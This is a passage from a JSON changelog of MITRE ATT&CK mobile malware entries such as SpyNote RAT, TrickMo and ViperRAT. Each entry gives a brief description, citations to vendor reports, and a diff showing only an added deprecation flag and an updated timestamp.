false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:23.488000+00:00\", \"old_value\": \"2025-04-16 21:22:07.299000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:40:31.154000+00:00", + "name": "SpyDealer", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) is Android malware that exfiltrates sensitive data from Android devices. (Citation: PaloAlto-SpyDealer)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0324", + "external_id": "S0324" + }, + { + "source_name": "SpyDealer", + "description": "(Citation: PaloAlto-SpyDealer)" + }, + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SpyDealer" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:31.154000+00:00\", \"old_value\": \"2025-04-16 21:22:10.366000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:45.794000+00:00", + "modified": "2025-04-25 14:40:17.353000+00:00", + "name": "SpyNote RAT", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) (Remote Access Trojan) is a family of malicious Android apps. The [SpyNote RAT](https://attack.mitre.org/software/S0305) builder tool can be used to develop malicious apps with the malware's functionality. (Citation: Zscaler-SpyNote)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0305", + "external_id": "S0305" + }, + { + "source_name": "SpyNote RAT", + "description": "(Citation: Zscaler-SpyNote)" + }, + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SpyNote RAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:17.353000+00:00\", \"old_value\": \"2025-04-16 21:22:04.768000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:40:14.412000+00:00", + "name": "Stealth Mango", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) is Android malware that has reportedly been used to successfully compromise the mobile devices of government officials, members of the military, medical professionals, and civilians. The iOS malware known as [Tangelo](https://attack.mitre.org/software/S0329) is believed to be from the same developer. (Citation: Lookout-StealthMango)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0328", + "external_id": "S0328" + }, + { + "source_name": "Stealth Mango", + "description": "(Citation: Lookout-StealthMango)" + }, + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Stealth Mango" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:14.412000+00:00\", \"old_value\": \"2025-04-16 21:22:03.669000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "malware", + "id": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-18 20:14:46.858000+00:00", + "modified": "2025-04-25 14:40:43.667000+00:00", + "name": "TERRACOTTA", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) is an ad fraud botnet that has been capable of generating over 2 billion fraudulent requests per week.(Citation: WhiteOps TERRACOTTA)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0545", + "external_id": "S0545" + }, + { + "source_name": "WhiteOps TERRACOTTA", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020.", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "TERRACOTTA" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:43.667000+00:00\", \"old_value\": \"2025-04-16 21:22:15.370000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:40:22.408000+00:00", + "name": "Tangelo", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) is iOS malware that is believed to be from the same developers as the [Stealth Mango](https://attack.mitre.org/software/S0328) Android malware. It is not a mobile application, but rather a Debian package that can only run on jailbroken iOS devices. (Citation: Lookout-StealthMango)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0329", + "external_id": "S0329" + }, + { + "source_name": "Tangelo", + "description": "(Citation: Lookout-StealthMango)" + }, + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Tangelo" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:22.408000+00:00\", \"old_value\": \"2025-04-16 21:22:06.838000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-01-05 20:16:19.968000+00:00", + "modified": "2025-04-25 14:40:38.825000+00:00", + "name": "Tiktok Pro", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) is spyware that has been masquerading as the TikTok application.(Citation: Zscaler TikTok Spyware)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0558", + "external_id": "S0558" + }, + { + "source_name": "Zscaler TikTok Spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021.", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Tiktok Pro" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:38.825000+00:00\", \"old_value\": \"2025-04-16 21:22:13.285000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-07-16 14:33:12.034000+00:00", + "modified": "2025-04-25 14:40:44.380000+00:00", + "name": "Triada", + "description": "[Triada](https://attack.mitre.org/software/S0424) was first reported in 2016 as a second stage malware. Later versions in 2019 appeared with new techniques and as an initial downloader of other Trojan apps.(Citation: Kaspersky Triada March 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0424", + "external_id": "S0424" + }, + { + "source_name": "Kaspersky Triada March 2016", + "description": "Snow, J. (2016, March 3). Triada: organized crime on Android. Retrieved July 16, 2019.", + "url": "https://www.kaspersky.com/blog/triada-trojan/11481/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Triada" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:44.380000+00:00\", \"old_value\": \"2025-04-16 21:22:15.523000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-04-24 17:46:31.111000+00:00", + "modified": "2025-04-25 14:40:17.722000+00:00", + "name": "TrickMo", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) a 2FA bypass mobile banking trojan, most likely being distributed by [TrickBot](https://attack.mitre.org/software/S0266). [TrickMo](https://attack.mitre.org/software/S0427) has been primarily targeting users located in Germany.(Citation: SecurityIntelligence TrickMo)\n\n[TrickMo](https://attack.mitre.org/software/S0427) is designed to steal transaction authorization numbers (TANs), which are typically used as one-time passwords.(Citation: SecurityIntelligence TrickMo) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0427", + "external_id": "S0427" + }, + { + "source_name": "SecurityIntelligence TrickMo", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020.", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "TrickMo" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ohad Mana, Check Point", + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:17.722000+00:00\", \"old_value\": \"2025-04-16 21:22:04.918000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--a1867c56-8c86-455a-96ad-b0d5f7e2bc17", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:46.411000+00:00", + "modified": "2025-04-25 14:40:34.229000+00:00", + "name": "Trojan-SMS.AndroidOS.Agent.ao", + "description": "[Trojan-SMS.AndroidOS.Agent.ao](https://attack.mitre.org/software/S0307) is Android malware. (Citation: Kaspersky-MobileMalware)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0307", + "external_id": "S0307" + }, + { + "source_name": "Trojan-SMS.AndroidOS.Agent.ao", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:34.229000+00:00\", \"old_value\": \"2025-04-16 21:22:11.724000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--28e39395-91e7-4f02-b694-5e079c964da9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:46.107000+00:00", + "modified": "2025-04-25 14:40:20.063000+00:00", + "name": "Trojan-SMS.AndroidOS.FakeInst.a", + "description": "[Trojan-SMS.AndroidOS.FakeInst.a](https://attack.mitre.org/software/S0306) is Android malware. (Citation: Kaspersky-MobileMalware)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0306", + "external_id": "S0306" + }, + { + "source_name": "Trojan-SMS.AndroidOS.FakeInst.a", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:20.063000+00:00\", \"old_value\": \"2025-04-16 21:22:05.907000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--d89c132d-7752-4c7f-9372-954a71522985", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:46.734000+00:00", + "modified": "2025-04-25 14:40:41.844000+00:00", + "name": "Trojan-SMS.AndroidOS.OpFake.a", + "description": "[Trojan-SMS.AndroidOS.OpFake.a](https://attack.mitre.org/software/S0308) is Android malware. (Citation: Kaspersky-MobileMalware)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0308", + "external_id": "S0308" + }, + { + "source_name": "Trojan-SMS.AndroidOS.OpFake.a", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:41.844000+00:00\", \"old_value\": \"2025-04-16 21:22:14.410000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:42.313000+00:00", + "modified": "2025-04-25 14:40:24.958000+00:00", + "name": "Twitoor", + "description": "[Twitoor](https://attack.mitre.org/software/S0302) is a dropper application capable of receiving commands from social media.(Citation: ESET-Twitoor)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0302", + "external_id": "S0302" + }, + { + "source_name": "Twitoor", + "description": "(Citation: ESET-Twitoor)" + }, + { + "source_name": "ESET-Twitoor", + "description": "ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. Retrieved December 22, 2016.", + "url": "http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Twitoor" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:24.958000+00:00\", \"old_value\": \"2025-04-16 21:22:07.968000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-11-21 16:42:48.203000+00:00", + "modified": "2025-04-25 14:40:30.243000+00:00", + "name": "ViceLeaker", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) is a spyware framework, capable of extensive surveillance and data exfiltration operations, primarily targeting devices belonging to Israeli citizens.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0418", + "external_id": "S0418" + }, + { + "source_name": "ViceLeaker", + "description": "(Citation: SecureList - ViceLeaker 2019)" + }, + { + "source_name": "Triout", + "description": "(Citation: SecureList - ViceLeaker 2019)" + }, + { + "source_name": "SecureList - ViceLeaker 2019", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/" + }, + { + "source_name": "Bitdefender - Triout 2018", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout \u2013 Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020.", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ViceLeaker", + "Triout" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:30.243000+00:00\", \"old_value\": \"2025-04-16 21:22:10.060000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-11 16:22:02.954000+00:00", + "modified": "2025-04-25 14:40:45.280000+00:00", + "name": "ViperRAT", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) is sophisticated surveillanceware that has been in operation since at least 2015 and was used to target the Israeli Defense Force.(Citation: Lookout ViperRAT) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0506", + "external_id": "S0506" + }, + { + "source_name": "Lookout ViperRAT", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/viperrat-mobile-apt" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ViperRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:45.280000+00:00\", \"old_value\": \"2025-04-16 21:22:15.850000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:37.020000+00:00", + "modified": "2025-04-25 14:40:21.687000+00:00", + "name": "WireLurker", + "description": "[WireLurker](https://attack.mitre.org/software/S0312) is a family of macOS malware that targets iOS devices connected over USB. (Citation: PaloAlto-WireLurker)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0312", + "external_id": "S0312" + }, + { + "source_name": "WireLurker", + "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.", + "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + }, + { + "source_name": "PaloAlto-WireLurker", + "description": "Claud Xiao. (2014, November 5). WireLurker: A New Era in OS X and iOS Malware. Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:21.687000+00:00\", \"old_value\": \"2025-04-16 21:22:06.693000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-20 13:27:33.113000+00:00", + "modified": "2025-04-25 14:40:42.935000+00:00", + "name": "WolfRAT", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) is malware based on a leaked version of [Dendroid](https://attack.mitre.org/software/S0301) that has primarily targeted Thai users. [WolfRAT](https://attack.mitre.org/software/S0489) has most likely been operated by the now defunct organization Wolf Research.(Citation: Talos-WolfRAT) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0489", + "external_id": "S0489" + }, + { + "source_name": "Talos-WolfRAT", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020.", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "WolfRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:42.935000+00:00\", \"old_value\": \"2025-04-16 21:22:14.905000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--56660521-6db4-4e5a-a927-464f22954b7c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:42.034000+00:00", + "modified": "2025-04-25 14:40:26.968000+00:00", + "name": "X-Agent for Android", + "description": "[X-Agent for Android](https://attack.mitre.org/software/S0314) is Android malware that was placed in a repackaged version of a Ukrainian artillery targeting application. The malware reportedly retrieved general location data on where the victim device was used, and therefore could likely indicate the potential location of Ukrainian artillery. (Citation: CrowdStrike-Android) Is it tracked separately from the [CHOPSTICK](https://attack.mitre.org/software/S0023).", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0314", + "external_id": "S0314" + }, + { + "source_name": "X-Agent for Android", + "description": "(Citation: CrowdStrike-Android)" + }, + { + "source_name": "CrowdStrike-Android", + "description": "CrowdStrike Global Intelligence Team. (2016). Use of Fancy Bear Android Malware in Tracking of Ukrainian FIeld Artillery Units. Retrieved February 6, 2017.", + "url": "https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": 